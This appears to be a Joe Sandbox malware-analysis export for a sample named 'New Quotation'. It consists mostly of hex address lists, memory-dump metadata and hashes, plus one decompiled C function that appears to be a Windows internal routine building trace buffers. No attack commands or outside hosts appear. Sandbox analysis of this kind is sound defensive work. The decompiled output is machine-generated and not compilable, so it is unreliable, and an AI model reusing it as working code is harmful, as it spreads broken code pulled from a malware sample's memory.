                                                                                                                                                                                          0x1d868214
                                                                                                                                                                                          0x1d868218
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868218
                                                                                                                                                                                          0x1d868203
                                                                                                                                                                                          0x1d868206
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868206
                                                                                                                                                                                          0x1d8681d8
                                                                                                                                                                                          0x1d8681da
                                                                                                                                                                                          0x1d8681dc
                                                                                                                                                                                          0x1d8681dc
                                                                                                                                                                                          0x1d8681e0
                                                                                                                                                                                          0x1d8681e2
                                                                                                                                                                                          0x1d8681e4
                                                                                                                                                                                          0x1d8681e4
                                                                                                                                                                                          0x1d8681e7
                                                                                                                                                                                          0x1d868221
                                                                                                                                                                                          0x1d868221
                                                                                                                                                                                          0x1d868225
                                                                                                                                                                                          0x1d868228
                                                                                                                                                                                          0x1d86822b
                                                                                                                                                                                          0x1d86822d
                                                                                                                                                                                          0x1d86822d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d867fda
                                                                                                                                                                                          0x1d867fda
                                                                                                                                                                                          0x1d867fda
                                                                                                                                                                                          0x1d867fdc
                                                                                                                                                                                          0x1d867fdf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d867fe1
                                                                                                                                                                                          0x1d867fe4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d867fec
                                                                                                                                                                                          0x1d867ff3
                                                                                                                                                                                          0x1d867ff8
                                                                                                                                                                                          0x1d867ffa
                                                                                                                                                                                          0x1d868024
                                                                                                                                                                                          0x1d868027
                                                                                                                                                                                          0x1d86802a
                                                                                                                                                                                          0x1d86802a
                                                                                                                                                                                          0x1d86802d
                                                                                                                                                                                          0x1d86802f
                                                                                                                                                                                          0x1d8681ed
                                                                                                                                                                                          0x1d8681ed
                                                                                                                                                                                          0x1d868170
                                                                                                                                                                                          0x1d86817a
                                                                                                                                                                                          0x1d86817c
                                                                                                                                                                                          0x1d868182
                                                                                                                                                                                          0x1d868183
                                                                                                                                                                                          0x1d868189
                                                                                                                                                                                          0x1d868190
                                                                                                                                                                                          0x1d868192
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868198
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868198
                                                                                                                                                                                          0x1d868043
                                                                                                                                                                                          0x1d868043
                                                                                                                                                                                          0x1d868045
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868056
                                                                                                                                                                                          0x1d86805a
                                                                                                                                                                                          0x1d868061
                                                                                                                                                                                          0x1d868067
                                                                                                                                                                                          0x1d86806a
                                                                                                                                                                                          0x1d86806d
                                                                                                                                                                                          0x1d868072
                                                                                                                                                                                          0x1d868079
                                                                                                                                                                                          0x1d86807f
                                                                                                                                                                                          0x1d868082
                                                                                                                                                                                          0x1d868084
                                                                                                                                                                                          0x1d86808b
                                                                                                                                                                                          0x1d86808f
                                                                                                                                                                                          0x1d868095
                                                                                                                                                                                          0x1d868097
                                                                                                                                                                                          0x1d86809b
                                                                                                                                                                                          0x1d8680a1
                                                                                                                                                                                          0x1d8680a7
                                                                                                                                                                                          0x1d8680ad
                                                                                                                                                                                          0x1d868161
                                                                                                                                                                                          0x1d868164
                                                                                                                                                                                          0x1d868167
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d86816d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d86816d
                                                                                                                                                                                          0x1d8680b9
                                                                                                                                                                                          0x1d8680c2
                                                                                                                                                                                          0x1d8680c2
                                                                                                                                                                                          0x1d8680c5
                                                                                                                                                                                          0x1d8680c8
                                                                                                                                                                                          0x1d8680cb
                                                                                                                                                                                          0x1d8680d1
                                                                                                                                                                                          0x1d8680e1
                                                                                                                                                                                          0x1d8680e6
                                                                                                                                                                                          0x1d8680ec
                                                                                                                                                                                          0x1d8680ee
                                                                                                                                                                                          0x1d8680f5
                                                                                                                                                                                          0x1d8680fc
                                                                                                                                                                                          0x1d868104
                                                                                                                                                                                          0x1d86810f
                                                                                                                                                                                          0x1d868119
                                                                                                                                                                                          0x1d868124
                                                                                                                                                                                          0x1d868124
                                                                                                                                                                                          0x1d868124
                                                                                                                                                                                          0x1d868124
                                                                                                                                                                                          0x1d868130
                                                                                                                                                                                          0x1d868136
                                                                                                                                                                                          0x1d868137
                                                                                                                                                                                          0x1d86813d
                                                                                                                                                                                          0x1d868147
                                                                                                                                                                                          0x1d86814d
                                                                                                                                                                                          0x1d868153
                                                                                                                                                                                          0x1d868153
                                                                                                                                                                                          0x1d86815b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d86815b
                                                                                                                                                                                          0x1d867ffc
                                                                                                                                                                                          0x1d867fff
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868001
                                                                                                                                                                                          0x1d868004
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868006
                                                                                                                                                                                          0x1d868009
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868011
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868011
                                                                                                                                                                                          0x1d868019
                                                                                                                                                                                          0x1d868019
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868019
                                                                                                                                                                                          0x1d867ee3
                                                                                                                                                                                          0x1d867ee6
                                                                                                                                                                                          0x1d867ee6
                                                                                                                                                                                          0x1d867ee8
                                                                                                                                                                                          0x1d867eeb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d867ef1
                                                                                                                                                                                          0x1d867ef4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d867f00
                                                                                                                                                                                          0x1d867f07
                                                                                                                                                                                          0x1d867f0c
                                                                                                                                                                                          0x1d867f0e
                                                                                                                                                                                          0x1d867f2d
                                                                                                                                                                                          0x1d867f30
                                                                                                                                                                                          0x1d867f33
                                                                                                                                                                                          0x1d867f37
                                                                                                                                                                                          0x1d867f44
                                                                                                                                                                                          0x1d867f46
                                                                                                                                                                                          0x1d867f49
                                                                                                                                                                                          0x1d867f4c
                                                                                                                                                                                          0x1d867f55
                                                                                                                                                                                          0x1d867f57
                                                                                                                                                                                          0x1d867f57
                                                                                                                                                                                          0x1d867f57
                                                                                                                                                                                          0x1d867f4e
                                                                                                                                                                                          0x1d867f4e
                                                                                                                                                                                          0x1d867f50
                                                                                                                                                                                          0x1d867f50
                                                                                                                                                                                          0x1d867f5d
                                                                                                                                                                                          0x1d867f62
                                                                                                                                                                                          0x1d867f6c
                                                                                                                                                                                          0x1d867f6e
                                                                                                                                                                                          0x1d867f71
                                                                                                                                                                                          0x1d867f74
                                                                                                                                                                                          0x1d867f76
                                                                                                                                                                                          0x1d867f7b
                                                                                                                                                                                          0x1d867f89
                                                                                                                                                                                          0x1d867f8b
                                                                                                                                                                                          0x1d867f8d
                                                                                                                                                                                          0x1d867f8e
                                                                                                                                                                                          0x1d867f91
                                                                                                                                                                                          0x1d867f9b
                                                                                                                                                                                          0x1d867f9f
                                                                                                                                                                                          0x1d867fa1
                                                                                                                                                                                          0x1d867fa4
                                                                                                                                                                                          0x1d867faa
                                                                                                                                                                                          0x1d867fb0
                                                                                                                                                                                          0x1d867fb2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d867fb2
                                                                                                                                                                                          0x1d867f10
                                                                                                                                                                                          0x1d867f13
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d867f15
                                                                                                                                                                                          0x1d867f18
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d867f1a
                                                                                                                                                                                          0x1d867f1d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d867f25
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d867f25
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d867e73
                                                                                                                                                                                          0x1d867e73
                                                                                                                                                                                          0x1d867e79
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d867e79
                                                                                                                                                                                          0x1d867e71
                                                                                                                                                                                          0x1d867e3b
                                                                                                                                                                                          0x1d867e3b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d867e3b
                                                                                                                                                                                          0x1d867db7
                                                                                                                                                                                          0x1d867dbf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: b1954ba63c12b749822df62dacd2b20ff701f6e5f7072a6b8455d2d39e3e8236
                                                                                                                                                                                          • Instruction ID: 4ea38818eec4b3f27f09ee2fd989100302af5088b6050ca254fa2e842c5103e3
                                                                                                                                                                                          • Opcode Fuzzy Hash: b1954ba63c12b749822df62dacd2b20ff701f6e5f7072a6b8455d2d39e3e8236
                                                                                                                                                                                          • Instruction Fuzzy Hash: 23426CB5E102198FDB24CF68C881BADB7F5BF48710F158099E94DEB241E738A985CF61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D81088E Relevance: .6, Instructions: 606COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                          			E1D81088E(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void _v44;
				intOrPtr _v84;
				char _v88;
				intOrPtr _v108;
				intOrPtr _v136;
				char _v140;
				signed int _v144;
				char _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				char _v228;
				intOrPtr _v232;
				char _v236;
				signed int _v240;
				signed int _v244;
				intOrPtr _v260;
				intOrPtr _v264;
				char _v272;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t333;
				signed int _t334;
				signed int _t341;
				signed int _t342;
				signed int _t351;
				signed int _t353;
				signed int _t360;
				signed int _t361;
				short _t364;
				signed int _t369;
				intOrPtr _t370;
				intOrPtr _t373;
				signed int _t376;
				signed int _t379;
				signed int _t381;
				signed int _t382;
				signed int _t385;
				char _t405;
				signed int _t410;
				intOrPtr _t418;
				char _t421;
				short _t450;
				signed int _t454;
				signed int _t470;
				signed int _t472;
				signed int _t476;
				signed int _t479;
				signed int _t480;
				signed int _t482;
				signed int _t486;
				signed int _t493;
				void* _t494;
				signed int _t495;
				signed int _t497;
				signed int _t499;
				signed int _t500;
				signed int _t501;
				intOrPtr* _t504;
				char _t505;
				signed int _t511;
				signed int _t514;
				signed int _t515;
				signed int _t518;
				signed int _t519;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t536;

				_t513 = __edx;
				_v8 =  *0x1d8cb370 ^ _t536;
				_v184 = _v184 & 0x00000000;
				_t482 = __ecx;
				_v196 = __edx;
				_v188 = __ecx;
				E1D818F40( &_v88, 0, 0x2c);
				E1D818F40( &_v140, 0, 0x30);
				_v168 = _v168 & 0;
				_v192 = _v192 & 0;
				_t486 = 8;
				memset( &_v44, 0, _t486 << 2);
				_t487 = 0;
				if(( *(_t482 + 0xd4) & 0x00000008) != 0) {
					_t199 = _t482 + 0x74; // 0x74
					_t200 = _t482 + 0x84; // 0x84
					_t513 = _t200;
					_t201 = _t482 + 0x7c; // 0x7c
					_t487 = _t201;
					E1D8A2C11(_t201, _t200, __eflags, _t199);
				}
				_t522 =  *((intOrPtr*)(_t482 + 0x78));
				_t532 =  *(_t482 + 0x8c);
				_t333 = _a4;
				_v180 =  *((intOrPtr*)(_t482 + 0x78));
				_v172 =  *(_t482 + 0x8c);
				if(_v196 != 0) {
					_v176 = _t333;
					_t334 = _t333 + 0x4f;
					goto L8;
				} else {
					_push(0);
					_push(0x2c);
					_push( &_v88);
					_push(0);
					_t470 = E1D812D10();
					_t523 = _t470;
					if(_t470 < 0) {
						L39:
						return E1D814B50(_t523, _t482, _v8 ^ _t536, _t513, _t523, _t532);
					}
					_push(0);
					_push(0x1c);
					_push( &_v272);
					_push(0);
					_push(0xfffffffe);
					_t472 = E1D812C00();
					_t523 = _t472;
					if(_t472 < 0) {
						goto L39;
					}
					_push(0);
					_push(0x20);
					_push( &_v44);
					_push(1);
					_push(0xfffffffe);
					_t476 = E1D812C00();
					_t523 = _t476;
					if(_t476 < 0) {
						goto L39;
					}
					_push(0);
					_push(0x30);
					_push( &_v140);
					_push(3);
					_t523 = E1D812D10();
					_t549 = _t523;
					if(_t523 < 0) {
						goto L39;
					}
					_t479 = E1D810E24( &_v184, _t549);
					_t523 = _t479;
					if(_t479 < 0) {
						goto L39;
					} else {
						_t480 =  *(_t482 + 0x6c) & 0x0000ffff;
						_t487 =  *(_t482 + 0x74) & 0x0000ffff;
						_t334 = _t480 + 0x183 + _t487;
						_v176 = _t480 + 0x134 + _t487;
						_t522 = _v180;
						L8:
						_v200 = _t334;
						_t532 = E1D7E5D90(_t487,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t532);
						_v180 = _t532;
						if(_t532 == 0) {
							_t523 = 0xc0000017;
							goto L39;
						}
						_t341 = E1D81163C(_t522, _t487,  &_a8, _t487,  &_v168);
						_t523 = _t341;
						if(_t341 < 0) {
							L42:
							_t342 = _v168;
							L37:
							if(_t342 != 0) {
								_push(_t342);
								E1D812A80();
							}
							L38:
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t532);
							goto L39;
						}
						_t524 = _v172;
						if(_a8 != 0) {
							_push(0);
							_push( &_v236);
							_push(_t524);
							_push(_t532);
							_v236 = 0;
							_push( &_v228);
							_push(0);
							_push(0);
							_push(0);
							_push(_v168);
							_v232 = 0;
							_t523 = E1D8129F0();
							__eflags = _t523;
							if(_t523 < 0) {
								goto L42;
							}
							__eflags =  *(_t532 + 0x88) & 0x00000002;
							if(( *(_t532 + 0x88) & 0x00000002) != 0) {
								L57:
								_t523 = 0xc000000d;
								goto L42;
							}
							__eflags =  *((intOrPtr*)(_t532 + 0x6c)) -  *0x7ffe026c;
							if( *((intOrPtr*)(_t532 + 0x6c)) !=  *0x7ffe026c) {
								goto L57;
							}
							__eflags =  *((intOrPtr*)(_t532 + 0x6d)) -  *0x7ffe0270;
							if( *((intOrPtr*)(_t532 + 0x6d)) !=  *0x7ffe0270) {
								goto L57;
							}
							__eflags =  *((intOrPtr*)(_t532 + 0x94)) - 4;
							if( *((intOrPtr*)(_t532 + 0x94)) != 4) {
								goto L57;
							}
							_t351 =  *(_t532 + 0x68);
							_v188 = _t351;
							__eflags = _t351 + 0xfffffc00 - 0xfffc00;
							if(_t351 + 0xfffffc00 > 0xfffc00) {
								goto L57;
							}
							_t353 =  *(_t532 + 0x8c);
							_v184 = _t353;
							__eflags = _t353;
							if(_t353 == 0) {
								goto L57;
							}
							__eflags =  *(_t532 + 0x78) |  *(_t532 + 0x7c);
							if(( *(_t532 + 0x78) |  *(_t532 + 0x7c)) == 0) {
								goto L57;
							}
							__eflags =  *((intOrPtr*)(_t532 + 0x74)) -  *((intOrPtr*)(_t482 + 0x88));
							if( *((intOrPtr*)(_t532 + 0x74)) !=  *((intOrPtr*)(_t482 + 0x88))) {
								goto L57;
							}
							_push(0);
							_push( &_v236);
							 *(_t532 + 0x78) = 0;
							 *(_t532 + 0x7c) = 0;
							_push( *(_t482 + 0x8c));
							_push(_t532);
							_push( &_v228);
							_push(0);
							_push(0);
							_push(0);
							_push(_v168);
							_t360 = E1D812A10();
							_t493 = _v188;
							_t523 = _t360;
							_t361 = _v184;
							 *(_t482 + 0xf4) =  *(_t482 + 0xf4) & 0x00000000;
							 *(_t482 + 0x118) = _t361;
							 *(_t482 + 0xe0) = _t361;
							 *(_t482 + 0xfc) =  *(_t482 + 0xfc) & 0x00000000;
							 *(_t482 + 0x8c) = _t493;
							 *(_t482 + 0xf0) = _t493;
							 *(_t482 + 0xf8) = _t361 * _t493;
							 *((intOrPtr*)(_t482 + 0x68)) = _v168;
							goto L38;
						}
						_t514 = _v196;
						_push("true");
						_pop(_t364);
						 *((short*)(_t532 + 0x36)) = _t364;
						 *_t532 = _t524;
						 *((short*)(_t532 + 0x34)) = 1;
						 *(_t532 + 0x30) = _v200 & 0xfffffff8;
						if(_t514 != 0) {
							_t525 = _a4;
							_t494 = 0;
							__eflags = _t525;
							if(_t525 == 0) {
								L73:
								_t369 = _v192;
								__eflags =  *((intOrPtr*)(_t369 + 0x2c)) - 8;
								if( *((intOrPtr*)(_t369 + 0x2c)) != 8) {
									_t370 =  *((intOrPtr*)(_t369 + 0x108));
								} else {
									_t370 =  *((intOrPtr*)(_t369 + 0x110));
								}
								 *((intOrPtr*)(_t482 + 0x10)) = _t370;
								_t298 = _t532 + 0x48; // 0x48
								E1D8188C0(_t298, _t514, _t525);
								L27:
								_t526 = _v168;
								if(( *(_t482 + 0xd4) & 0x04000000) != 0) {
									_t373 = 3;
									_push(_t373);
									 *((intOrPtr*)(_t532 + 0x2c)) = _t373;
									_push(0x18);
									_push( &_v164);
									_push( &_v228);
									_push(_t526);
									_t376 = E1D812E40();
									__eflags = _t376;
									if(_t376 < 0) {
										goto L28;
									}
									__eflags = _v196;
									_t501 =  *(_t532 + 0x30);
									if(_v196 != 0) {
										_t501 = _t501 + 0x50;
										__eflags = _t501;
									}
									_t495 = _t501 - 0x00000001 + _v144 &  ~_v144;
									_v172 = _t495;
									 *_t532 = _t495;
									L29:
									_t513 = _t532;
									 *(_t532 + 4) =  *(_t532 + 0x30);
									E1D810EC6(_t482, _t532, _t495);
									_t497 =  *(_t532 + 0x30);
									_t379 = _v172;
									if(_t497 < _t379 && _t497 > 0x48) {
										E1D818F40(_t497 + _t532, 0xff, _t379 - _t497);
										_t379 = _v172;
									}
									_push(0);
									_push(0);
									_push(_t379);
									_push(_t532);
									_push( &_v228);
									_push(0);
									_push(0);
									_push(0);
									_push(_t526);
									_t381 = E1D812A10();
									_t523 = _t381;
									if(_t381 < 0) {
										goto L42;
									} else {
										_t382 =  *(_t482 + 0xd0);
										if(_t382 == 0) {
											L35:
											 *(_t482 + 0xfc) =  *(_t482 + 0xfc) & 0x00000000;
											 *(_t482 + 0xf4) =  *(_t482 + 0xf4) & 0x00000000;
											 *(_t482 + 0x118) = 1;
											 *(_t482 + 0xe0) = 1;
											_t385 = _v172;
											 *(_t482 + 0xf8) = _t385;
											 *(_t482 + 0xf0) = _t385;
											 *((intOrPtr*)(_t482 + 0x68)) = _v168;
											if(( *(_t482 + 0xd4) & 0x04000000) != 0) {
												 *(_t482 + 0x144) =  *(_t482 + 0x144) & 0x00000000;
												 *(_t482 + 0x148) =  *(_t482 + 0x148) & 0x00000000;
												 *(_t482 + 0x140) =  *(_t482 + 0x140) & 0x00000000;
											}
											_t342 = 0;
											goto L37;
										}
										_t499 =  *(_t482 + 0xd4);
										if((_t499 & 0x00000020) != 0) {
											__eflags = _t499 & 0x00002000;
											_t500 = 0x400;
											if((_t499 & 0x00002000) == 0) {
												_t500 = 0x100000;
											}
											_t513 = _t382 * _t500 >> 0x20;
											_push("true");
											_v244 = _t382 * _t500;
											_push(8);
											_push( &_v244);
											_v240 = _t382 * _t500 >> 0x20;
											_push( &_v228);
											_push(_v168);
											_t523 = E1D812C20();
											__eflags = _t523;
											if(_t523 < 0) {
												goto L42;
											} else {
												goto L35;
											}
										}
										goto L35;
									}
								}
								L28:
								_t495 = _v172;
								goto L29;
							} else {
								goto L66;
							}
							do {
								L66:
								_t271 = _t514 + 0x20; // 0x20
								_v192 = _t271 + _t494;
								 *(_t514 + _t494 + 0x40) =  *(_t482 + 0xd4) & 0x04101000 | 0x00010001;
								 *((intOrPtr*)(_t514 + _t494 + 0x44)) = 1;
								 *_v192 =  *(_t482 + 0x8c);
								__eflags =  *(_t482 + 0xd4) & 0x04000000;
								if(( *(_t482 + 0xd4) & 0x04000000) != 0) {
									L70:
									__eflags = 0;
									_t405 = 2;
									goto L71;
								}
								__eflags =  *(_t482 + 0x8c) - 0x100000;
								if( *(_t482 + 0x8c) > 0x100000) {
									goto L70;
								}
								__eflags =  *((intOrPtr*)(_t514 + _t494 + 0x2c)) - 0x100;
								if( *((intOrPtr*)(_t514 + _t494 + 0x2c)) > 0x100) {
									goto L70;
								}
								_t405 = 1;
								L71:
								 *((char*)(_t514 + _t494 + 0x26)) = _t405;
								 *((char*)(_t514 + _t494 + 0x27)) = _t405;
								_t494 = _t494 + (( *(_t514 + _t494 + 4) & 0x0000ffff) + 0x00000007 & 0xfffffff8);
								__eflags = _t494 - _t525;
							} while (_t494 < _t525);
							_t532 = _v180;
							goto L73;
						}
						_t410 = _v176;
						_t46 = _t532 + 0x48; // 0x48
						_t504 = _t46;
						 *(_t504 + 4) = _t410;
						 *_t504 = 0xc0010000;
						if( *((intOrPtr*)(_t482 + 0x10)) != 2) {
							__eflags =  *((intOrPtr*)(_t482 + 0x10)) - 3;
							if( *((intOrPtr*)(_t482 + 0x10)) != 3) {
								_v212 = _v212 & 0x00000000;
								_v208 = _v208 & 0x00000000;
								E1D7FBC50( &_v212);
								_t250 = _t532 + 0x48; // 0x48
								_t504 = _t250;
								 *(_t504 + 0x10) = _v212;
								 *(_t504 + 0x14) = _v208;
							} else {
								asm("rdtsc");
								 *(_t504 + 0x10) = _t410;
								 *(_t504 + 0x14) = _t514;
							}
							goto L16;
						} else {
							while(1) {
								_t519 =  *0x7ffe0018;
								_v176 =  *0x7FFE0014;
								if(_t519 ==  *0x7FFE001C) {
									_t532 = _v180;
									_t482 = _v188;
									_t524 = _v172;
									 *(_t504 + 0x10) = _v176;
									 *(_t504 + 0x14) = _t519;
									break;
								}
								asm("pause");
							}
							L16:
							 *((intOrPtr*)(_t504 + 0xc)) = _v264;
							 *((intOrPtr*)(_t504 + 8)) = _v260;
							 *((intOrPtr*)(_t532 + 0x60)) = E1D816310(_v28, _v24, _v84, 0);
							_t418 = E1D816310(_v20, _v16, _v84, 0);
							_t515 =  *[fs:0x30];
							 *((intOrPtr*)(_t532 + 0x64)) = _t418;
							 *((char*)(_t532 + 0x6c)) =  *((intOrPtr*)(_t515 + 0xa4));
							 *((char*)(_t532 + 0x6d)) =  *((intOrPtr*)(_t515 + 0xa8));
							if(( *(_t482 + 0xd4) & 0x04000000) != 0 ||  *(_t482 + 0x8c) > 0x100000 ||  *((intOrPtr*)(_t482 + 0x88)) > 0x100) {
								_t421 = 0;
								_t505 = 2;
							} else {
								_t421 = 5;
								_t505 = 1;
							}
							 *((char*)(_t532 + 0x6e)) = _t505;
							 *((char*)(_t532 + 0x6f)) = _t421;
							 *(_t532 + 0x70) =  *(_t515 + 0xac) & 0x0000ffff;
							 *((intOrPtr*)(_t532 + 0x170)) =  *((intOrPtr*)(_t482 + 0x10));
							 *((intOrPtr*)(_t532 + 0x74)) =  *((intOrPtr*)(_t482 + 0x88));
							 *((intOrPtr*)(_t532 + 0x94)) = 4;
							 *((intOrPtr*)(_t532 + 0x90)) = 1;
							 *(_t532 + 0x8c) = 1;
							 *(_t532 + 0x68) = _t524;
							 *(_t532 + 0x84) =  *(_t482 + 0xd0);
							 *(_t532 + 0x88) =  *(_t482 + 0xd4);
							 *((intOrPtr*)(_t532 + 0x80)) = _v84;
							asm("sbb eax, [ebp-0x64]");
							 *(_t532 + 0xa0) =  *(_t532 + 0xa0) & 0x00000000;
							 *(_t532 + 0xa4) =  *(_t532 + 0xa4) & 0x00000000;
							 *((intOrPtr*)(_t532 + 0x15c)) = _v136;
							 *(_t532 + 0x9c) = _v184;
							 *((intOrPtr*)(_t532 + 0x158)) = _v140 - _v108;
							E1D8188C0(_t532 + 0x178,  *((intOrPtr*)(_t482 + 0x70)), ( *(_t482 + 0x6c) & 0x0000ffff) + 2);
							E1D8188C0(( *(_t482 + 0x6c) & 0x0000ffff) + 0x17a + _t532,  *((intOrPtr*)(_t482 + 0x78)), ( *(_t482 + 0x74) & 0x0000ffff) + 2);
							E1D8112E5(_t532 + 0xa8);
							 *((intOrPtr*)(_t532 + 0x160)) =  *0x7ffe0300;
							 *((intOrPtr*)(_t532 + 0x164)) =  *0x7ffe0304;
							 *((intOrPtr*)(_t532 + 0x168)) =  *_t482;
							 *((intOrPtr*)(_t532 + 0x16c)) =  *((intOrPtr*)(_t482 + 4));
							 *((intOrPtr*)(_t532 + 0x58)) =  *((intOrPtr*)(_t482 + 8));
							 *((intOrPtr*)(_t532 + 0x5c)) =  *((intOrPtr*)(_t482 + 0xc));
							_t527 =  *(_t532 + 0x30);
							_v176 = _t527;
							if(_t527 + 0x50 >  *_t532) {
								goto L27;
							} else {
								_t450 = 0x50;
								 *((short*)(_t527 + _t532 + 6)) = _t450;
								 *((short*)(_t532 + 4 + _t527)) = _t450;
								 *((intOrPtr*)(_t527 + _t532)) = 0xc0010002;
								 *((intOrPtr*)(_t527 + _t532 + 8)) = _v260;
								 *((intOrPtr*)(_t527 + _t532 + 0xc)) = _v264;
								 *((intOrPtr*)(_t527 + _t532 + 0x18)) = E1D816310(_v28, _v24, _v84, 0);
								_t454 = E1D816310(_v20, _v16, _v84, 0);
								 *(_t527 + _t532 + 0x1c) = _t454;
								if( *((intOrPtr*)(_t482 + 0x10)) != 2) {
									__eflags =  *((intOrPtr*)(_t482 + 0x10)) - 3;
									if(__eflags != 0) {
										_v220 = _v220 & 0x00000000;
										_v216 = _v216 & 0x00000000;
										E1D7FBC50( &_v220);
										 *(_t527 + _t532 + 0x10) = _v220;
										 *(_t527 + _t532 + 0x14) = _v216;
									} else {
										asm("rdtsc");
										 *(_t527 + _t532 + 0x10) = _t454;
										 *(_t527 + _t532 + 0x14) = _t515;
									}
									L25:
									 *((intOrPtr*)(_t527 + _t532 + 0x20)) = 0;
									if(E1D81100E(_t532 + 0x30 + _t527, _t532 + 0x24 + _t527, _t563, _t532 + 0x28 + _t527, _t532 + 0x40 + _t527) == 0) {
										 *(_t532 + 0x30) =  *(_t532 + 0x30) + 0x50;
									}
									goto L27;
								}
								while(1) {
									_t511 =  *0x7ffe0018;
									_t518 =  *0x7FFE0014;
									_t563 = _t511 -  *((intOrPtr*)(0x7ffe001c));
									if(_t511 ==  *((intOrPtr*)(0x7ffe001c))) {
										break;
									}
									asm("pause");
								}
								_t532 = _v180;
								_t527 = _v176;
								_t482 = _v188;
								 *(_t527 + _t532 + 0x10) = _t518;
								 *(_t527 + _t532 + 0x14) = _t511;
								goto L25;
							}
						}
					}
				}
			}

























































































                                                                                                                                                                                          0x1d81088e
                                                                                                                                                                                          0x1d8108a0
                                                                                                                                                                                          0x1d8108a3
                                                                                                                                                                                          0x1d8108b2
                                                                                                                                                                                          0x1d8108b4
                                                                                                                                                                                          0x1d8108bd
                                                                                                                                                                                          0x1d8108c3
                                                                                                                                                                                          0x1d8108d6
                                                                                                                                                                                          0x1d8108e3
                                                                                                                                                                                          0x1d8108e9
                                                                                                                                                                                          0x1d8108f8
                                                                                                                                                                                          0x1d8108f9
                                                                                                                                                                                          0x1d8108f9
                                                                                                                                                                                          0x1d8108fb
                                                                                                                                                                                          0x1d849613
                                                                                                                                                                                          0x1d849617
                                                                                                                                                                                          0x1d849617
                                                                                                                                                                                          0x1d84961d
                                                                                                                                                                                          0x1d84961d
                                                                                                                                                                                          0x1d849620
                                                                                                                                                                                          0x1d849620
                                                                                                                                                                                          0x1d810908
                                                                                                                                                                                          0x1d81090b
                                                                                                                                                                                          0x1d810911
                                                                                                                                                                                          0x1d810914
                                                                                                                                                                                          0x1d81091a
                                                                                                                                                                                          0x1d810920
                                                                                                                                                                                          0x1d84962a
                                                                                                                                                                                          0x1d849630
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d810926
                                                                                                                                                                                          0x1d810926
                                                                                                                                                                                          0x1d810928
                                                                                                                                                                                          0x1d81092d
                                                                                                                                                                                          0x1d81092e
                                                                                                                                                                                          0x1d810930
                                                                                                                                                                                          0x1d810935
                                                                                                                                                                                          0x1d810939
                                                                                                                                                                                          0x1d810df3
                                                                                                                                                                                          0x1d810e03
                                                                                                                                                                                          0x1d810e03
